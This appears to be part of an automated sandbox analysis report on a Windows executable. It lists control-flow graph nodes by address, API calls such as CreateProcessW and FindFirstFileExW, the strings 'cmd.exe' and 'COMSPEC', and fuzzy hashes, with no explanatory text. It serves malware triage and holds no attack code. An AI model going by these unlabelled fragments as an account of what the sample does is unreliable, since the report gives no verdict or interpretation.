7825->7826 7827 7ff7d77f742a 7825->7827 7826->7827 7835 7ff7d77f7472 7826->7835 7828 7ff7d77f71bc 11 API calls 7827->7828 7829 7ff7d77f742f 7828->7829 7830 7ff7d77f7080 47 API calls 7829->7830 7831 7ff7d77f743a 7830->7831 7832 7ff7d77f752a 7833 7ff7d77f7585 7832->7833 7834 7ff7d77f755a 7832->7834 7839 7ff7d77f88f0 11 API calls 7833->7839 7836 7ff7d77f8128 57 API calls 7834->7836 7835->7832 7840 7ff7d77f88f0 11 API calls 7835->7840 7837 7ff7d77f7564 7836->7837 7838 7ff7d77f757d 7837->7838 7866 7ff7d77f7648 7837->7866 7853 7ff7d77f70a0 17 API calls 7838->7853 7842 7ff7d77f759f 7839->7842 7843 7ff7d77f74d8 7840->7843 7846 7ff7d77f75a7 7842->7846 7849 7ff7d77f6a88 47 API calls 7842->7849 7844 7ff7d77f74ef 7843->7844 7845 7ff7d77f74e0 7843->7845 7848 7ff7d77f6a88 47 API calls 7844->7848 7847 7ff7d77f71dc 11 API calls 7845->7847 7851 7ff7d77f71dc 11 API calls 7846->7851 7847->7831 7852 7ff7d77f7501 7848->7852 7850 7ff7d77f75ba 7849->7850 7850->7838 7855 7ff7d77f71bc 11 API calls 7850->7855 7851->7838 7852->7838 7915 7ff7d77fc990 7852->7915 7854 7ff7d77f7645 7853->7854 7860 7ff7d77f75c3 7855->7860 7858 7ff7d77f6a88 47 API calls 7858->7860 7859 7ff7d77f71dc 11 API calls 7859->7832 7860->7838 7860->7846 7860->7858 7861 7ff7d77f8128 57 API calls 7860->7861 7862 7ff7d77f7602 7860->7862 7861->7860 7863 7ff7d77f71bc 11 API calls 7862->7863 7864 7ff7d77f7607 7863->7864 7865 7ff7d77f7648 85 API calls 7864->7865 7865->7846 7867 7ff7d77f7694 7866->7867 7868 7ff7d77f767b 7866->7868 7867->7868 7870 7ff7d77f769f 7867->7870 7871 7ff7d77f76a9 7867->7871 7869 7ff7d77f71bc 11 API calls 7868->7869 7872 7ff7d77f7680 7869->7872 7873 7ff7d77f719c 11 API calls 7870->7873 7924 7ff7d77fccf4 7871->7924 7875 7ff7d77f7080 47 API calls 7872->7875 7873->7868 7877 7ff7d77f768b 7875->7877 7877->7838 7878 7ff7d77f76cc 7879 7ff7d77f71dc 11 API calls 7878->7879 7881 7ff7d77f76d5 7879->7881 7883 7ff7d77f71dc 11 API calls 7881->7883 7883->7877 7884 7ff7d77f7707 7886 7ff7d77f71dc 11 API calls 7884->7886 7885 7ff7d77f719c 11 API calls 7887 7ff7d77f771b 7885->7887 7886->7878 7952 7ff7d77fce58 7887->7952 7890 7ff7d77f77ee GetLastError 7891 7ff7d77f7130 11 API calls 7890->7891 7893 7ff7d77f77fb 7891->7893 7892 7ff7d77f789b 7896 7ff7d77f7800 CloseHandle 7893->7896 7897 7ff7d77f7809 7893->7897 7894 7ff7d77f7820 7898 7ff7d77f7826 7894->7898 7899 7ff7d77f784a 7894->7899 7895 7ff7d77f77a8 WaitForSingleObject GetExitCodeProcess 7895->7890 7900 7ff7d77f77c6 7895->7900 7896->7897 7897->7884 7901 7ff7d77f7812 CloseHandle 7897->7901 7902 7ff7d77f7834 7898->7902 7903 7ff7d77f782b CloseHandle 7898->7903 7906 7ff7d77f784f CloseHandle 7899->7906 7907 7ff7d77f7858 7899->7907 7904 7ff7d77f77cf CloseHandle 7900->7904 7905 7ff7d77f77d8 7900->7905 7901->7884 7902->7884 7908 7ff7d77f7839 CloseHandle 7902->7908 7903->7902 7904->7905 7905->7884 7909 7ff7d77f77dd CloseHandle 7905->7909 7906->7907 7910 7ff7d77f71dc 11 API calls 7907->7910 7908->7884 7909->7884 7911 7ff7d77f7861 7910->7911 7912 7ff7d77f71dc 11 API calls 7911->7912 7913 7ff7d77f786e 7912->7913 7914 7ff7d77f71dc 11 API calls 7913->7914 7914->7877 7916 7ff7d77fc9aa 7915->7916 7919 7ff7d77fc9a0 7915->7919 7917 7ff7d77f71bc 11 API calls 7916->7917 7918 7ff7d77fc9b1 7917->7918 7920 7ff7d77f7080 47 API calls 7918->7920 7919->7916 7922 7ff7d77fc9d7 7919->7922 7921 7ff7d77f7517 7920->7921 7921->7838 7921->7859 7922->7921 7923 7ff7d77f71bc 11 API calls 7922->7923 7923->7918 7925 7ff7d77fcd2b 7924->7925 7926 7ff7d77f88f0 11 API calls 7925->7926 7927 7ff7d77fcd61 7926->7927 7928 7ff7d77fcd69 7927->7928 7933 7ff7d77fcd7f 7927->7933 7930 7ff7d77f7130 11 API calls 7928->7930 7929 7ff7d77fcd76 7934 7ff7d77f71dc 11 API calls 7929->7934 7932 7ff7d77fcd71 7930->7932 7931 7ff7d77f6a88 47 API calls 7931->7933 7935 7ff7d77f71bc 11 API calls 7932->7935 7933->7929 7933->7931 7936 7ff7d77fce45 7933->7936 7937 7ff7d77fcde0 7934->7937 7935->7929 7938 7ff7d77f70a0 17 API calls 7936->7938 7939 7ff7d77fce05 7937->7939 7979 7ff7d77fc9fc 7937->7979 7941 7ff7d77fce57 7938->7941 7940 7ff7d77f71dc 11 API calls 7939->7940 7943 7ff7d77f76c4 7940->7943 7943->7878 7949 7ff7d77f7aa0 7943->7949 7944 7ff7d77fcdf7 7945 7ff7d77fcdfb 7944->7945 7946 7ff7d77fce07 7944->7946 7947 7ff7d77f71dc 11 API calls 7945->7947 7948 7ff7d77f71dc 11 API calls 7946->7948 7947->7939 7948->7939 8065 7ff7d77f73b8 7949->8065 7953 7ff7d77f808c 47 API calls 7952->7953 7954 7ff7d77fcee2 7953->7954 7955 7ff7d77fb880 5 API calls 7954->7955 7957 7ff7d77fcef1 7954->7957 7955->7957 7956 7ff7d77f7f10 14 API calls 7959 7ff7d77fcf54 7956->7959 7957->7956 7958 7ff7d77fd0bd 7962 7ff7d77fd0ce 7958->7962 7965 7ff7d77f71dc 11 API calls 7958->7965 7959->7958 7960 7ff7d77f808c 47 API calls 7959->7960 7961 7ff7d77fcf68 7960->7961 7964 7ff7d77fcf72 7961->7964 7968 7ff7d77fb880 5 API calls 7961->7968 7963 7ff7d77fd0dd 7962->7963 7966 7ff7d77f71dc 11 API calls 7962->7966 7967 7ff7d77f778d 7963->7967 7969 7ff7d77f71dc 11 API calls 7963->7969 7970 7ff7d77f7f10 14 API calls 7964->7970 7965->7962 7966->7963 7967->7890 7967->7892 7967->7894 7967->7895 7968->7964 7969->7967 7971 7ff7d77fcfd5 7970->7971 7971->7958 7972 7ff7d77fd071 CreateProcessW 7971->7972 7973 7ff7d77f808c 47 API calls 7971->7973 7972->7958 7974 7ff7d77fcff9 7973->7974 7975 7ff7d77fb880 5 API calls 7974->7975 7976 7ff7d77fd003 7974->7976 7975->7976 7977 7ff7d77f7f10 14 API calls 7976->7977 7978 7ff7d77fd066 7977->7978 7978->7958 7978->7972 7980 7ff7d77fca3b 7979->7980 7981 7ff7d77fcbd0 7979->7981 7982 7ff7d77f7398 73 API calls 7980->7982 7984 7ff7d77f1030 8 API calls 7981->7984 7983 7ff7d77fca66 7982->7983 7986 7ff7d77fca6a 7983->7986 7991 7ff7d77fca7f 7983->7991 7985 7ff7d77fccc5 7984->7985 7985->7944 7987 7ff7d77fca73 7986->7987 7988 7ff7d77fccdd 7986->7988 7990 7ff7d77f71bc 11 API calls 7987->7990 7989 7ff7d77f70a0 17 API calls 7988->7989 7996 7ff7d77fccf1 7989->7996 8042 7ff7d77fca78 7990->8042 7992 7ff7d77fa194 16 API calls 7991->7992 7993 7ff7d77fcad5 7992->7993 7995 7ff7d77fcadd 7993->7995 8007 7ff7d77fcaec 7993->8007 7994 7ff7d77f71dc 11 API calls 7994->7981 7997 7ff7d77f71dc 11 API calls 7995->7997 7998 7ff7d77f88f0 11 API calls 7996->7998 7997->8042 7999 7ff7d77fcd61 7998->7999 8000 7ff7d77fcd69 7999->8000 8006 7ff7d77fcd7f 7999->8006 8002 7ff7d77f7130 11 API calls 8000->8002 8001 7ff7d77fcd76 8008 7ff7d77f71dc 11 API calls 8001->8008 8005 7ff7d77fcd71 8002->8005 8003 7ff7d77f6a88 47 API calls 8003->8006 8004 7ff7d77fcb78 8012 7ff7d77f88f0 11 API calls 8004->8012 8009 7ff7d77f71bc 11 API calls 8005->8009 8006->8001 8006->8003 8010 7ff7d77fce45 8006->8010 8007->8004 8007->8007 8050 7ff7d77ff3ec 8007->8050 8011 7ff7d77fcde0 8008->8011 8009->8001 8013 7ff7d77f70a0 17 API calls 8010->8013 8019 7ff7d77fc9fc 73 API calls 8011->8019 8031 7ff7d77fce05 8011->8031 8015 7ff7d77fcb98 8012->8015 8018 7ff7d77fce57 8013->8018 8016 7ff7d77fcba0 8015->8016 8022 7ff7d77fcbdb 8015->8022 8020 7ff7d77f7130 11 API calls 8016->8020 8017 7ff7d77f71dc 11 API calls 8021 7ff7d77fce26 8017->8021 8023 7ff7d77fcdf7 8019->8023 8024 7ff7d77fcba8 8020->8024 8021->7944 8022->7988 8030 7ff7d77fcc3c 8022->8030 8032 7ff7d77f6a88 47 API calls 8022->8032 8025 7ff7d77fcdfb 8023->8025 8026 7ff7d77fce07 8023->8026 8028 7ff7d77f71bc 11 API calls 8024->8028 8027 7ff7d77f71dc 11 API calls 8025->8027 8029 7ff7d77f71dc 11 API calls 8026->8029 8027->8031 8033 7ff7d77fcbad 8028->8033 8029->8031 8034 7ff7d77fcc87 8030->8034 8036 7ff7d77f6a88 47 API calls 8030->8036 8031->8017 8032->8022 8035 7ff7d77f71dc 11 API calls 8033->8035 8038 7ff7d77f71dc 11 API calls 8034->8038 8037 7ff7d77fcbba 8035->8037 8039 7ff7d77fcc51 8036->8039 8040 7ff7d77f71dc 11 API calls 8037->8040 8041 7ff7d77fcca6 8038->8041 8039->7988 8044 7ff7d77fc990 47 API calls 8039->8044 8040->8042 8043 7ff7d77f71dc 11 API calls 8041->8043 8042->7994 8045 7ff7d77fccae 8043->8045 8046 7ff7d77fcc6b 8044->8046 8047 7ff7d77f71dc 11 API calls 8045->8047 8046->7988 8046->8034 8048 7ff7d77fc990 47 API calls 8046->8048 8047->7981 8049 7ff7d77fcc83 8048->8049 8049->7988 8049->8034 8051 7ff7d77ff3f9 8050->8051 8054 7ff7d77ff42f 8050->8054 8053 7ff7d77f71bc 11 API calls 8051->8053 8063 7ff7d77ff3a0 8051->8063 8052 7ff7d77ff459 8056 7ff7d77f71bc 11 API calls 8052->8056 8055 7ff7d77ff403 8053->8055 8054->8052 8057 7ff7d77ff47e 8054->8057 8058 7ff7d77f7080 47 API calls 8055->8058 8059 7ff7d77ff45e 8056->8059 8062 7ff7d77f808c 47 API calls 8057->8062 8064 7ff7d77ff469 8057->8064 8060 7ff7d77ff40e 8058->8060 8061 7ff7d77f7080 47 API calls 8059->8061 8060->8007 8061->8064 8062->8064 8063->8007 8064->8007 8072 7ff7d77fa734 EnterCriticalSection 8065->8072 8067 7ff7d77f73d4 8068 7ff7d77f78a4 11 API calls 8067->8068 8069 7ff7d77f73dd 8068->8069 8070 7ff7d77fa788 LeaveCriticalSection 8069->8070 8071 7ff7d77f73e7 8070->8071 8071->7884 8071->7885 8595 7ff7d77f3c78 8596 7ff7d77f21bc 56 API calls 8595->8596 8597 7ff7d77f3cad 8596->8597 8598 7ff7d77f21bc 56 API calls 8597->8598 8599 7ff7d77f3cbb 8598->8599 8600 7ff7d77f21bc 56 API calls 8599->8600 8601 7ff7d77f3cff 8600->8601 8602 7ff7d77f21bc 56 API calls 8601->8602 8603 7ff7d77f3d08 8602->8603 8604 7ff7d77f21bc 56 API calls 8603->8604 8605 7ff7d77f3d11 8604->8605 8618 7ff7d77f2ab4 8605->8618 8608 7ff7d77f21bc 56 API calls 8609 7ff7d77f3d41 8608->8609 8625 7ff7d77f2af0 8609->8625 8612 7ff7d77f21bc 56 API calls 8613 7ff7d77f3e2e 8612->8613 8614 7ff7d77f21bc 56 API calls 8613->8614 8615 7ff7d77f3e37 8614->8615 8617 7ff7d77f3e1b 8617->8612 8619 7ff7d77f21bc 56 API calls 8618->8619 8620 7ff7d77f2ac5 8619->8620 8621 7ff7d77f2ad0 8620->8621 8622 7ff7d77f21bc 56 API calls 8620->8622 8623 7ff7d77f21bc 56 API calls 8621->8623 8622->8621 8624 7ff7d77f2ae1 8623->8624 8624->8608 8624->8609 8626 7ff7d77f21bc 56 API calls 8625->8626 8627 7ff7d77f2b02 8626->8627 8628 7ff7d77f2b3d 8627->8628 8630 7ff7d77f21bc 56 API calls 8627->8630 8629 7ff7d77f6ae8 47 API calls 8628->8629 8631 7ff7d77f2b42 8629->8631 8632 7ff7d77f2b0d 8630->8632 8632->8628 8633 7ff7d77f2b29 8632->8633 8634 7ff7d77f21bc 56 API calls 8633->8634 8635 7ff7d77f2b2e 8634->8635 8635->8617 8636 7ff7d77f2008 8635->8636 8637 7ff7d77f21bc 56 API calls 8636->8637 8638 7ff7d77f2016 8637->8638 8638->8617 9148 7ff7d7801f94 9149 7ff7d77f2af0 56 API calls 9148->9149 9153 7ff7d7801fa7 9149->9153 9150 7ff7d7801fe6 9151 7ff7d77f21bc 56 API calls 9150->9151 9152 7ff7d7801ffa 9151->9152 9154 7ff7d77f21bc 56 API calls 9152->9154 9153->9150 9155 7ff7d77f2008 56 API calls 9153->9155 9156 7ff7d780200a 9154->9156 9155->9150 8441 7ff7d77fdb13 8442 7ff7d77fdb50 8441->8442 8443 7ff7d77fdb65 8442->8443 8445 7ff7d77fdb7e 8442->8445 8444 7ff7d77f71bc 11 API calls 8443->8444 8446 7ff7d77fdb6a 8444->8446 8448 7ff7d77f808c 47 API calls 8445->8448 8449 7ff7d77fdb75 8445->8449 8447 7ff7d77f7080 47 API calls 8446->8447 8447->8449 8448->8449 8639 7ff7d77f8890 8640 7ff7d77f88a0 8639->8640 8641 7ff7d77f8708 11 API calls 8640->8641 8642 7ff7d77f88ab 8640->8642 8641->8642 8792 7ff7d77f8410 8793 7ff7d77f8415 8792->8793 8794 7ff7d77f842a 8792->8794 8798 7ff7d77f8430 8793->8798 8799 7ff7d77f8472 8798->8799 8800 7ff7d77f847a 8798->8800 8802 7ff7d77f71dc 11 API calls 8799->8802 8801 7ff7d77f71dc 11 API calls 8800->8801 8803 7ff7d77f8487 8801->8803 8802->8800 8804 7ff7d77f71dc 11 API calls 8803->8804 8805 7ff7d77f8494 8804->8805 8806 7ff7d77f71dc 11 API calls 8805->8806 8807 7ff7d77f84a1 8806->8807 8808 7ff7d77f71dc 11 API calls 8807->8808 8809 7ff7d77f84ae 8808->8809 8810 7ff7d77f71dc 11 API calls 8809->8810 8811 7ff7d77f84bb 8810->8811 8812 7ff7d77f71dc 11 API calls 8811->8812 8813 7ff7d77f84c8 8812->8813 8814 7ff7d77f71dc 11 API calls 8813->8814 8815 7ff7d77f84d5 8814->8815 8816 7ff7d77f71dc 11 API calls 8815->8816 8817 7ff7d77f84e5 8816->8817 8818 7ff7d77f71dc 11 API calls 8817->8818 8819 7ff7d77f84f5 8818->8819 8824 7ff7d77f82e0 8819->8824 8838 7ff7d77fa734 EnterCriticalSection 8824->8838 8643 7ff7d77fbc8c GetProcessHeap 9160 7ff7d77fc58c 9161 7ff7d77fc597 9160->9161 9169 7ff7d77ff060 9161->9169 9182 7ff7d77fa734 EnterCriticalSection 9169->9182 8450 7ff7d77f8b08 8451 7ff7d77f8b2d 8450->8451 8459 7ff7d77f8b44 8450->8459 8452 7ff7d77f71bc 11 API calls 8451->8452 8454 7ff7d77f8b32 8452->8454 8453 7ff7d77f8bfc 8456 7ff7d77f59b0 11 API calls 8453->8456 8455 7ff7d77f7080 47 API calls 8454->8455 8473 7ff7d77f8b3d 8455->8473 8457 7ff7d77f8c54 8456->8457 8460 7ff7d77f8c5c 8457->8460 8478 7ff7d77f8c8e 8457->8478 8459->8453 8470 7ff7d77f8bd4 8459->8470 8474 7ff7d77f8b91 8459->8474 8482 7ff7d77f8d4c 8459->8482 8462 7ff7d77f71dc 11 API calls 8460->8462 8461 7ff7d77f8ced 8463 7ff7d77f71dc 11 API calls 8461->8463 8469 7ff7d77f8c63 8462->8469 8477 7ff7d77f8cf8 8463->8477 8464 7ff7d77f71dc 11 API calls 8464->8469 8465 7ff7d77f71dc 11 API calls 8465->8470 8466 7ff7d77f8d11 8472 7ff7d77f71dc 11 API calls 8466->8472 8467 7ff7d77f71dc 11 API calls 8467->8473 8468 7ff7d77f71dc 11 API calls 8468->8474 8469->8464 8476 7ff7d77f8bb4 8469->8476 8470->8465 8470->8476 8471 7ff7d77f71dc 11 API calls 8471->8477 8472->8473 8474->8468 8474->8476 8476->8467 8477->8466 8477->8471 8478->8461 8479 7ff7d77f8d33 8478->8479 8504 7ff7d77fd5f0 8478->8504 8480 7ff7d77f70a0 17 API calls 8479->8480 8481 7ff7d77f8d48 8480->8481 8483 7ff7d77f8d7a 8482->8483 8483->8483 8484 7ff7d77f88f0 11 API calls 8483->8484 8485 7ff7d77f8dc5 8484->8485 8486 7ff7d77fd5f0 47 API calls 8485->8486 8487 7ff7d77f8dfb 8486->8487 8488 7ff7d77f70a0 17 API calls 8487->8488 8489 7ff7d77f8ecf 8488->8489 8490 7ff7d77f808c 47 API calls 8489->8490 8491 7ff7d77f8fb2 8490->8491 8492 7ff7d77fb880 5 API calls 8491->8492 8493 7ff7d77f8fdd 8492->8493 8494 7ff7d77f7f10 14 API calls 8493->8494 8495 7ff7d77f9022 FindFirstFileExW 8494->8495 8496 7ff7d77f9079 8495->8496 8497 7ff7d77f808c 47 API calls 8496->8497 8498 7ff7d77f90a9 8497->8498 8499 7ff7d77fb880 5 API calls 8498->8499 8500 7ff7d77f90d2 8499->8500 8513 7ff7d77f897c 8500->8513 8503 7ff7d77f8d4c 57 API calls 8508 7ff7d77fd60d 8504->8508 8505 7ff7d77fd612 8506 7ff7d77fd628 8505->8506 8507 7ff7d77f71bc 11 API calls 8505->8507 8506->8478 8509 7ff7d77fd61c 8507->8509 8508->8505 8508->8506 8511 7ff7d77fd65c 8508->8511 8510 7ff7d77f7080 47 API calls 8509->8510 8510->8506 8511->8506 8512 7ff7d77f71bc 11 API calls 8511->8512 8512->8509 8514 7ff7d77f89a6 8513->8514 8515 7ff7d77f89ca 8513->8515 8519 7ff7d77f71dc 11 API calls 8514->8519 8521 7ff7d77f89b5 8514->8521 8516 7ff7d77f8a24 8515->8516 8517 7ff7d77f89d0 8515->8517 8518 7ff7d77fa0b4 WideCharToMultiByte 8516->8518 8520 7ff7d77f89e5 8517->8520 8517->8521 8522 7ff7d77f71dc 11 API calls 8517->8522 8529 7ff7d77f8a48 8518->8529 8519->8521 8523 7ff7d77fb070 12 API calls 8520->8523 8521->8503 8522->8520 8523->8521 8524 7ff7d77f8a4f GetLastError 8525 7ff7d77f7130 11 API calls 8524->8525 8527 7ff7d77f8a5c 8525->8527 8526 7ff7d77f8a8c 8526->8521 8530 7ff7d77fa0b4 WideCharToMultiByte 8526->8530 8531 7ff7d77f71bc 11 API calls 8527->8531 8528 7ff7d77f8a80 8533 7ff7d77fb070 12 API calls 8528->8533 8529->8524 8529->8526 8529->8528 8532 7ff7d77f71dc 11 API calls 8529->8532 8534 7ff7d77f8ad8 8530->8534 8531->8521 8532->8528 8533->8526 8534->8521 8534->8524

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID: COMSPEC$cmd.exe
                                                                                                                                                                                                                • API String ID: 485612231-2256226045
                                                                                                                                                                                                                • Opcode ID: e3c8c1c89efee8ce5da41e7d845e16cba20a98ffcbbe375bf0f7f7e3e9597ed0
                                                                                                                                                                                                                • Instruction ID: bbc1e0408fea72822bc4662ab93ee3ae4d7cbf1e4b9a19d989f48b381989f5d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3c8c1c89efee8ce5da41e7d845e16cba20a98ffcbbe375bf0f7f7e3e9597ed0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54315132B08B0189F714BB65DA425ACF2A1AF8D764BC54D37EE1D57685CE38D4068670

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 356 7ff7d77f73f8-7ff7d77f7428 357 7ff7d77f745b-7ff7d77f745e 356->357 358 7ff7d77f742a-7ff7d77f743a call 7ff7d77f71bc call 7ff7d77f7080 356->358 357->358 360 7ff7d77f7460-7ff7d77f7463 357->360 368 7ff7d77f743e-7ff7d77f745a 358->368 360->358 361 7ff7d77f7465-7ff7d77f746b 360->361 361->358 363 7ff7d77f746d-7ff7d77f7470 361->363 363->358 365 7ff7d77f7472-7ff7d77f7499 call 7ff7d780118c * 2 363->365 372 7ff7d77f749f-7ff7d77f74a2 365->372 373 7ff7d77f752c-7ff7d77f752f 365->373 374 7ff7d77f7539-7ff7d77f7558 call 7ff7d780118c 372->374 375 7ff7d77f74a8-7ff7d77f74b9 call 7ff7d780118c 372->375 376 7ff7d77f7536 373->376 377 7ff7d77f7531-7ff7d77f7534 373->377 382 7ff7d77f7585 374->382 383 7ff7d77f755a-7ff7d77f7566 call 7ff7d77f8128 374->383 375->374 384 7ff7d77f74bb 375->384 376->374 377->374 377->376 386 7ff7d77f7588-7ff7d77f758f 382->386 391 7ff7d77f756c-7ff7d77f7578 call 7ff7d77f7648 383->391 392 7ff7d77f7627 383->392 387 7ff7d77f74be-7ff7d77f74c5 384->387 386->386 389 7ff7d77f7591-7ff7d77f75a5 call 7ff7d77f88f0 386->389 387->387 390 7ff7d77f74c7-7ff7d77f74de call 7ff7d77f88f0 387->390 402 7ff7d77f75ab-7ff7d77f75bc call 7ff7d77f6a88 389->402 403 7ff7d77f75a7-7ff7d77f75a9 389->403 398 7ff7d77f74ef-7ff7d77f7503 call 7ff7d77f6a88 390->398 399 7ff7d77f74e0-7ff7d77f74ea call 7ff7d77f71dc 390->399 401 7ff7d77f757d-7ff7d77f7580 391->401 400 7ff7d77f762f 392->400 406 7ff7d77f7631-7ff7d77f7647 call 7ff7d77f70a0 398->406 415 7ff7d77f7509-7ff7d77f7519 call 7ff7d77fc990 398->415 399->368 400->406 401->392 402->400 414 7ff7d77f75be-7ff7d77f75ca call 7ff7d77f71bc 402->414 407 7ff7d77f7622 call 7ff7d77f71dc 403->407 407->392 421 7ff7d77f75cd-7ff7d77f75e0 call 7ff7d77f6a88 414->421 415->406 422 7ff7d77f751f-7ff7d77f752a call 7ff7d77f71dc 415->422 421->400 427 7ff7d77f75e2-7ff7d77f75ee call 7ff7d77f8128 421->427 422->374 430 7ff7d77f7602-7ff7d77f761c call 7ff7d77f71bc call 7ff7d77f7648 427->430 431 7ff7d77f75f0-7ff7d77f75fe 427->431 434 7ff7d77f761f 430->434 431->421 432 7ff7d77f7600 431->432 432->434 434->407
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID: .com
                                                                                                                                                                                                                • API String ID: 485612231-4200470757
                                                                                                                                                                                                                • Opcode ID: a3411b78a9230fd7b513c6962f24126251d892dc989e786e47a4f55becc28119
                                                                                                                                                                                                                • Instruction ID: c6d278c53bf00b186c760c349b1393563da10c85ca805c5d97bf461703854420
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3411b78a9230fd7b513c6962f24126251d892dc989e786e47a4f55becc28119
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA518311F0964345FA59BA269A116BDE681AF49BF4FC84D36DE1D477C2EE3CE40382A0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 7ff7d77f7648-7ff7d77f7679 1 7ff7d77f7694-7ff7d77f7697 0->1 2 7ff7d77f767b-7ff7d77f768f call 7ff7d77f71bc call 7ff7d77f7080 0->2 1->2 4 7ff7d77f7699-7ff7d77f769d 1->4 16 7ff7d77f787e-7ff7d77f789a 2->16 5 7ff7d77f769f-7ff7d77f76a7 call 7ff7d77f719c 4->5 6 7ff7d77f76a9-7ff7d77f76ca call 7ff7d77fccf4 4->6 5->2 14 7ff7d77f76cc-7ff7d77f76e5 call 7ff7d77f71dc * 2 6->14 15 7ff7d77f76ea-7ff7d77f7705 call 7ff7d77f7aa0 6->15 14->16 22 7ff7d77f7716-7ff7d77f7797 call 7ff7d77f719c call 7ff7d78013c0 call 7ff7d77fce58 15->22 23 7ff7d77f7707-7ff7d77f7714 call 7ff7d77f71dc 15->23 33 7ff7d77f77ee-7ff7d77f77fe GetLastError call 7ff7d77f7130 22->33 34 7ff7d77f7799-7ff7d77f779d 22->34 23->14 42 7ff7d77f7800-7ff7d77f7803 CloseHandle 33->42 43 7ff7d77f7809-7ff7d77f780c 33->43 36 7ff7d77f77a3-7ff7d77f77a6 34->36 37 7ff7d77f789b-7ff7d77f78a3 call 7ff7d77f6298 34->37 40 7ff7d77f7820-7ff7d77f7824 36->40 41 7ff7d77f77a8-7ff7d77f77c4 WaitForSingleObject GetExitCodeProcess 36->41 44 7ff7d77f7826-7ff7d77f7829 40->44 45 7ff7d77f784a-7ff7d77f784d 40->45 41->33 47 7ff7d77f77c6-7ff7d77f77cd 41->47 42->43 43->23 48 7ff7d77f7812-7ff7d77f781b CloseHandle 43->48 49 7ff7d77f7834-7ff7d77f7837 44->49 50 7ff7d77f782b-7ff7d77f782e CloseHandle 44->50 53 7ff7d77f784f-7ff7d77f7852 CloseHandle 45->53 54 7ff7d77f7858-7ff7d77f787b call 7ff7d77f71dc * 3 45->54 51 7ff7d77f77cf-7ff7d77f77d2 CloseHandle 47->51 52 7ff7d77f77d8-7ff7d77f77db 47->52 48->23 55 7ff7d77f7842-7ff7d77f7845 49->55 56 7ff7d77f7839-7ff7d77f783c CloseHandle 49->56 50->49 51->52 57 7ff7d77f77e6-7ff7d77f77e9 52->57 58 7ff7d77f77dd-7ff7d77f77e0 CloseHandle 52->58 53->54 54->16 55->23 56->55 57->23 58->57
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 17306042-0
                                                                                                                                                                                                                • Opcode ID: b31d8921cc63fcc389b3533738d7b07000d37d85641a9ec7b60fb67a70f7207e
                                                                                                                                                                                                                • Instruction ID: 6cd55e251d12d541d6b89f0fbf624d1130b9cb54558d59a360e5c43616828813
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b31d8921cc63fcc389b3533738d7b07000d37d85641a9ec7b60fb67a70f7207e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF614222B19A0285FB20BF61D9401BCE7A1AB49BB4BD50D36DD4D57B84CE3CE457C3A0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
